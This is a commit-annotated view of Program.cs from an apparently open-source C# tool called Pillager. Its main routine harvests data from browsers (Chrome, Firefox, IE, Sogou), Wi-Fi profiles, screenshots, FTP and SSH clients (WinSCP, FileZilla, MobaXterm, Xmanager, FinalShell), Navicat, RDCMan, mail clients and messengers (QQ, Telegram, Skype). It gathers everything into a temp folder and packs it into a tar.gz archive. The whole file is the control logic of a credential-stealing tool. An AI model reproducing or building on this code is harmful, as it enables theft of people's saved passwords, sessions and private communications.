Pillager/Pillager/Program.cs

59 lines
1.5 KiB
C#
Raw Normal View History

2023-11-10 11:56:46 -08:00
using System.IO;
2023-04-24 08:38:01 -07:00
using Pillager.Browsers;
2023-11-17 23:18:18 -08:00
using Pillager.FTP;
2023-11-10 11:56:46 -08:00
using Pillager.Helper;
using Pillager.Mails;
2023-10-26 00:37:40 -07:00
using Pillager.Messengers;
2023-10-26 03:32:09 -07:00
using Pillager.Others;
2023-10-26 00:37:40 -07:00
using Pillager.Tools;
2023-04-23 16:22:43 -07:00
namespace Pillager
{
internal class Program
{
static void Main(string[] args)
{
2023-06-20 01:09:56 -07:00
string savepath = Path.Combine(Path.GetTempPath(), "Pillager");
2023-11-10 11:56:46 -08:00
string savezippath = savepath + ".tar.gz";
2023-09-27 17:07:33 -07:00
if (Directory.Exists(savepath)) Directory.Delete(savepath, true);
if (File.Exists(savezippath)) File.Delete(savezippath);
Directory.CreateDirectory(savepath);
2023-04-24 08:38:01 -07:00
2023-11-07 04:36:10 -08:00
//Browsers
IE.Save(savepath);
OldSogou.Save(savepath);//SogouExplorer < 12.x
Chrome.Save(savepath);
FireFox.Save(savepath);
//Others
Wifi.Save(savepath);
2023-12-06 03:19:29 -08:00
ScreenShot.Save(savepath);
2023-11-07 04:36:10 -08:00
2023-11-17 23:18:18 -08:00
//FTP
WinSCP.Save(savepath);
2023-12-06 03:19:29 -08:00
FileZilla.Save(savepath);
2023-11-17 23:18:18 -08:00
2023-10-26 00:37:40 -07:00
//Tools
MobaXterm.Save(savepath);
2023-11-06 08:28:58 -08:00
Xmanager.Save(savepath);
2023-11-12 06:13:48 -08:00
Navicat.Save(savepath);
2023-11-12 08:40:17 -08:00
RDCMan.Save(savepath);
2023-11-19 04:40:32 -08:00
FinalShell.Save(savepath);
2023-10-26 00:37:40 -07:00
//Mail
MailMaster.Save(savepath);
2023-11-13 10:43:32 -08:00
Foxmail.Save(savepath);
2023-10-26 00:37:40 -07:00
//Messengers
2023-10-15 12:02:06 -07:00
QQ.Save(savepath);
2023-10-07 04:09:27 -07:00
Telegram.Save(savepath);
2023-10-23 01:17:19 -07:00
Skype.Save(savepath);
2023-11-09 09:40:10 -08:00
Enigma.Save(savepath);
2023-10-23 01:17:19 -07:00
2023-11-10 11:56:46 -08:00
//Tar.gz
Tar.Pack(savepath, savezippath);
2023-09-27 17:07:33 -07:00
Directory.Delete(savepath, true);
2023-04-23 16:22:43 -07:00
}
}
}